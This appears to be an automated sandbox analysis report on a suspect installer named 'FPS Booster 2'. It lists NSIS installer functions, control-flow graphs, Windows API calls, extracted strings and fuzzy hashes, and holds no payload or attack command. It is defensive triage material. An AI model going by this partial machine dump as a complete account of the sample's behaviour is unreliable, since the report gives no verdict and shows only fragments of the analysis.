                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 27 4030ee-4030f2 1->27 4 401601-401611 call 4062cf 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062cf SetFileAttributesW 2->8 9 401650-40166d call 40137e call 4062cf call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062cf call 405d85 2->10 11 401672-401686 call 40145c call 4062cf 2->11 12 401693-4016ac call 401446 call 4062cf 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062cf call 404f9e 2->14 15 4016d6-4016db 2->15 16 401736-40173d 2->16 17 401897-4018a7 call 40145c call 406301 2->17 18 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062cf SetForegroundWindow 2->20 4->27 38 401751-401755 ShowWindow 5->38 39 401758-40175f 5->39 61 4019a3-4019a8 6->61 62 40197f-401984 6->62 7->1 67 4019ec-4019f8 7->67 8->1 80 40179a-4017a6 call 4062cf 8->80 9->27 104 401864-40186c 10->104 105 4017de-4017fc call 405d32 CreateDirectoryW 10->105 81 401689-40168e call 404f9e 11->81 86 4016b1-4016b8 Sleep 12->86 87 4016ae-4016b0 12->87 13->27 35 401632-401637 14->35 33 401702-401710 15->33 34 4016dd-4016fd call 401446 15->34 37 4030dd-4030de 16->37 82 4018c2-4018d6 call 4062cf 17->82 83 4018a9-4018bd call 4062cf 17->83 116 401912-401919 18->116 117 40191e-401921 18->117 19->35 36 401647-40164e PostQuitMessage 19->36 20->1 33->1 34->1 35->27 36->35 37->1 56 4030de call 405f7d 37->56 38->39 39->1 41 401765-401769 ShowWindow 39->41 41->1 56->1 74 4019af-4019b2 61->74 73 401986-401989 62->73 62->74 67->1 67->37 73->74 84 40198b-401993 call 406301 73->84 74->1 88 4019b8-4019c5 GetShortPathNameW 74->88 99 4017ab-4017ac 80->99 81->1 82->27 83->27 84->61 109 401995-4019a1 call 406035 84->109 86->1 87->86 88->1 99->1 107 401890-401892 104->107 108 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 104->108 120 401846-40184e call 4062cf 105->120 121 4017fe-401809 GetLastError 105->121 107->81 108->1 109->74 116->81 122 401923-40192b call 406301 117->122 123 40194a-401950 117->123 135 401853-401854 120->135 126 401827-401832 GetFileAttributesW 121->126 127 40180b-401825 GetLastError call 4062cf 121->127 122->123 140 40192d-401948 call 406c94 call 404f9e 122->140 125 401957-40195d call 4062cf 123->125 125->99 133 401834-401844 call 4062cf 126->133 134 401855-40185e 126->134 127->134 133->135 134->104 134->105 135->134 140->125
                                                APIs
                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                • ShowWindow.USER32(?), ref: 00401753
                                                • ShowWindow.USER32(?), ref: 00401767
                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                • SetCurrentDirectoryW.KERNEL32(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                Strings
                                                • Rename on reboot: %s, xrefs: 00401943
                                                • BringToFront, xrefs: 004016BD
                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                • Call: %d, xrefs: 0040165A
                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                • Rename failed: %s, xrefs: 0040194B
                                                • Sleep(%d), xrefs: 0040169D
                                                • Aborting: "%s", xrefs: 0040161D
                                                • SetFileAttributes failed., xrefs: 004017A1
                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                • detailprint: %s, xrefs: 00401679
                                                • Rename: %s, xrefs: 004018F8
                                                • Jump: %d, xrefs: 00401602
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                • API String ID: 2872004960-3619442763
                                                • Opcode ID: b3b674945a8ce1646f82cd1a2970868ccc34f917f5dbcfb57dbe7a977c86b510
                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                • Opcode Fuzzy Hash: b3b674945a8ce1646f82cd1a2970868ccc34f917f5dbcfb57dbe7a977c86b510
                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                Function 6FFB188A Relevance: 54.5, APIs: 21, Strings: 10, Instructions: 215memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 6FFB18A4
                                                • HeapAlloc.KERNEL32(00000000), ref: 6FFB18A7
                                                • GetProcessHeap.KERNEL32(00000000,00000000,error,?,00000000,?,?,?,?,00000000,00000000), ref: 6FFB18E9
                                                • RtlFreeHeap.NTDLL(00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 6FFB1B4E
                                                  • Part of subcall function 6FFB1E83: GlobalAlloc.KERNELBASE(00000040,?,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1E99
                                                  • Part of subcall function 6FFB1E83: lstrcpynW.KERNEL32(00000004,00000104,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess$FreeGloballstrcpyn
                                                • String ID: BUTTON$COMBOBOX$EDIT$LINK$LISTBOX$NSIS: nsControl pointer property$RICHEDIT_CLASS$RichEdit$STATIC$error
                                                • API String ID: 1913068523-3375361224
                                                • Opcode ID: 338ecf551f453f9fda7fb7afd7eca21a177edb66853a5e14375405a10e84b2ad
                                                • Instruction ID: 13751149430b9cc2a350ed92b31e57b6093b593d07756c569b4f33cbdacbc717
                                                • Opcode Fuzzy Hash: 338ecf551f453f9fda7fb7afd7eca21a177edb66853a5e14375405a10e84b2ad
                                                • Instruction Fuzzy Hash: C1819072D54608EBDB219FA6CE85F9ABBBCFF09394F018119E904B7250D735E9148FA0
                                                Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 314 4054a5-4054b7 315 4055f9-405608 314->315 316 4054bd-4054c3 314->316 318 405657-40566c 315->318 319 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 315->319 316->315 317 4054c9-4054d2 316->317 320 4054d4-4054e1 SetWindowPos 317->320 321 4054e7-4054ea 317->321 323 4056ac-4056b1 call 403ddb 318->323 324 40566e-405671 318->324 319->318 320->321 326 405504-40550a 321->326 327 4054ec-4054fe ShowWindow 321->327 332 4056b6-4056d1 323->332 329 405673-40567e call 40139d 324->329 330 4056a4-4056a6 324->330 333 405526-405529 326->333 334 40550c-405521 DestroyWindow 326->334 327->326 329->330 345 405680-40569f SendMessageW 329->345 330->323 331 40594c 330->331 339 40594e-405955 331->339 337 4056d3-4056d5 call 40141d 332->337 338 4056da-4056e0 332->338 342 40552b-405537 SetWindowLongW 333->342 343 40553c-405542 333->343 340 405929-40592f 334->340 337->338 348 4056e6-4056f1 338->348 349 40590a-405923 DestroyWindow EndDialog 338->349 340->331 346 405931-405937 340->346 342->339 350 4055e5-4055f4 call 403df6 343->350 351 405548-405559 GetDlgItem 343->351 345->339 346->331 353 405939-405942 ShowWindow 346->353 348->349 354 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 348->354 349->340 350->339 355 405578-40557b 351->355 356 40555b-405572 SendMessageW IsWindowEnabled 351->356 353->331 384 405746-40574c 354->384 385 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 354->385 357 405580-405583 355->357 358 40557d-40557e 355->358 356->331 356->355 362 405591-405596 357->362 363 405585-40558b 357->363 361 4055ae-4055b3 call 403d44 358->361 361->350 365 4055cc-4055df SendMessageW 362->365 367 405598-40559e 362->367 363->365 366 40558d-40558f 363->366 365->350 366->361 370 4055a0-4055a6 call 40141d 367->370 371 4055b5-4055be call 40141d 367->371 382 4055ac 370->382 371->350 380 4055c0-4055ca 371->380 380->382 382->361 384->385 388 405790 385->388 389 40578d-40578e 385->389 390 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 388->390 389->390 391 4057c2-4057d3 SendMessageW 390->391 392 4057d5 390->392 393 4057db-405812 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 391->393 392->393 401 405817-405819 393->401 401->332 402 40581f-405821 401->402 402->332 403 405827-40582b 402->403 404 40584a-40585e DestroyWindow 403->404 405 40582d-405833 403->405 404->340 407 405864-405891 CreateDialogParamW 404->407 405->331 406 405839-40583f 405->406 406->332 408 405845 406->408 407->340 409 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 407->409 408->331 409->331 414 4058f0-405908 ShowWindow call 403ddb 409->414 414->340
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                • ShowWindow.USER32(?), ref: 004054FE
                                                • DestroyWindow.USER32 ref: 00405512
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 3282139019-0
                                                • Opcode ID: 4d26819c9312f202396544013fe3d2d1a004a07f50c44ef3b4413d080c8abd80
                                                • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                • Opcode Fuzzy Hash: 4d26819c9312f202396544013fe3d2d1a004a07f50c44ef3b4413d080c8abd80
                                                • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                Function 00405958 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 233stringregistrylibraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 417 405958-405970 call 406328 420 405972-405982 call 405f7d 417->420 421 405984-4059bc call 405eff 417->421 430 4059df-405a08 call 403ec1 call 4067aa 420->430 426 4059d4-4059da lstrcatW 421->426 427 4059be-4059cf call 405eff 421->427 426->430 427->426 435 405a9c-405aa4 call 4067aa 430->435 436 405a0e-405a13 430->436 442 405ab2-405ab9 435->442 443 405aa6-405aad call 406831 435->443 436->435 437 405a19-405a33 call 405eff 436->437 441 405a38-405a41 437->441 441->435 444 405a43-405a47 441->444 446 405ad2-405af7 LoadImageW 442->446 447 405abb-405ac1 442->447 443->442 450 405a49-405a58 call 405d32 444->450 451 405a5b-405a67 lstrlenW 444->451 448 405b92-405b9a call 40141d 446->448 449 405afd-405b3f RegisterClassW 446->449 447->446 452 405ac3-405ac8 call 403ea0 447->452 467 405ba4-405baf call 403ec1 448->467 468 405b9c-405b9f 448->468 453 405c61 449->453 454 405b45-405b8d SystemParametersInfoW CreateWindowExW 449->454 450->451 457 405a69-405a77 lstrcmpiW 451->457 458 405a8f-405a97 call 40674e call 406035 451->458 452->446 463 405c63-405c6a 453->463 454->448 457->458 464 405a79-405a83 GetFileAttributesW 457->464 458->435 469 405a85-405a87 464->469 470 405a89-405a8a call 40677d 464->470 475 405bb5-405bd2 ShowWindow LoadLibraryW 467->475 476 405c38-405c40 call 405073 467->476 468->463 469->458 469->470 470->458 478 405bd4-405bd9 LoadLibraryW 475->478 479 405bdb-405bed GetClassInfoW 475->479 483 405c42-405c48 476->483 484 405c5a-405c5c call 40141d 476->484 478->479 481 405c05-405c28 DialogBoxParamW call 40141d 479->481 482 405bef-405bff GetClassInfoW RegisterClassW 479->482 488 405c2d-405c36 call 403c94 481->488 482->481 483->468 486 405c4e-405c55 call 40141d 483->486 484->453 486->468 488->463
                                                APIs
                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                • lstrlenW.KERNEL32(Show,?,?,?,Show,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                • lstrcmpiW.KERNEL32(?,.exe,Show,?,?,?,Show,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                • GetFileAttributesW.KERNEL32(Show), ref: 00405A7A
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Show$_Nb
                                                • API String ID: 608394941-1865872846
                                                • Opcode ID: d20d728eb82b6ec0bfd99ba95e735b3369be8e81bc17f383275f6e38f7aac643
                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                • Opcode Fuzzy Hash: d20d728eb82b6ec0bfd99ba95e735b3369be8e81bc17f383275f6e38f7aac643
                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                Function 6E9E1C1B Relevance: 37.3, APIs: 18, Strings: 3, Instructions: 559stringmemorylibraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6E9E1581: GlobalAlloc.KERNELBASE(00000040,?,6E9E15BA,?,?,6E9E185F,?,6E9E1017), ref: 6E9E158B
                                                  • Part of subcall function 6E9E15A3: lstrcpyW.KERNEL32(00000000,?,?,?,6E9E185F,?,6E9E1017), ref: 6E9E15C1
                                                  • Part of subcall function 6E9E15A3: GlobalFree.KERNEL32 ref: 6E9E15D2
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6E9E1D0B
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6E9E1D59
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6E9E1D63
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E1D7D
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1E69
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1E6E
                                                • GlobalFree.KERNELBASE(?), ref: 6E9E1E73
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E201A
                                                • lstrcpyW.KERNEL32(?,?), ref: 6E9E217A
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6E9E21EE
                                                • LoadLibraryW.KERNEL32(00000008), ref: 6E9E21FF
                                                • lstrcmpiW.KERNEL32(kernel32,00000008), ref: 6E9E221B
                                                • lstrcmpiW.KERNEL32(kernel32.dll,00000008), ref: 6E9E2227
                                                • lstrlenW.KERNEL32(00000808), ref: 6E9E2258
                                                • lstrcatW.KERNEL32(00000808,6E9E30C8), ref: 6E9E227C
                                                • lstrcpyW.KERNEL32(?,00000808), ref: 6E9E22C7
                                                • lstrcatW.KERNEL32(?,00000057), ref: 6E9E22DE
                                                • lstrcatW.KERNEL32(00000808,00000057), ref: 6E9E2307
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$lstrcat$Alloclstrcmpi$HandleLibraryLoadModulelstrlen
                                                • String ID: W$kernel32$kernel32.dll
                                                • API String ID: 2496820534-4093004423
                                                • Opcode ID: a5a88b85c5c1632b600f2095ed1c0678d2ba3cb049703146cb72a036ceafcde6
                                                • Instruction ID: 9c25dd1a96d3f0629b8a6c197737099dd6da1b626ed54b611e41eadc8e6bc6d7
                                                • Opcode Fuzzy Hash: a5a88b85c5c1632b600f2095ed1c0678d2ba3cb049703146cb72a036ceafcde6
                                                • Instruction Fuzzy Hash: AB128A71904206DECB56CFEAC8846EEB7B8FF4A315F10492EE365A7990D770D6888F50
                                                Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • lstrcatW.KERNEL32(00000000,00000000,Show,004D70B0,00000000,00000000), ref: 00401A76
                                                • CompareFileTime.KERNEL32(-00000014,?,Show,Show,00000000,00000000,Show,004D70B0,00000000,00000000), ref: 00401AA0
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$Show
                                                • API String ID: 4286501637-2784701388
                                                • Opcode ID: 879180ffdf271ada8e3a0b4b989ad1a783c732f8dcb62547d18be893587f2823
                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                • Opcode Fuzzy Hash: 879180ffdf271ada8e3a0b4b989ad1a783c732f8dcb62547d18be893587f2823
                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
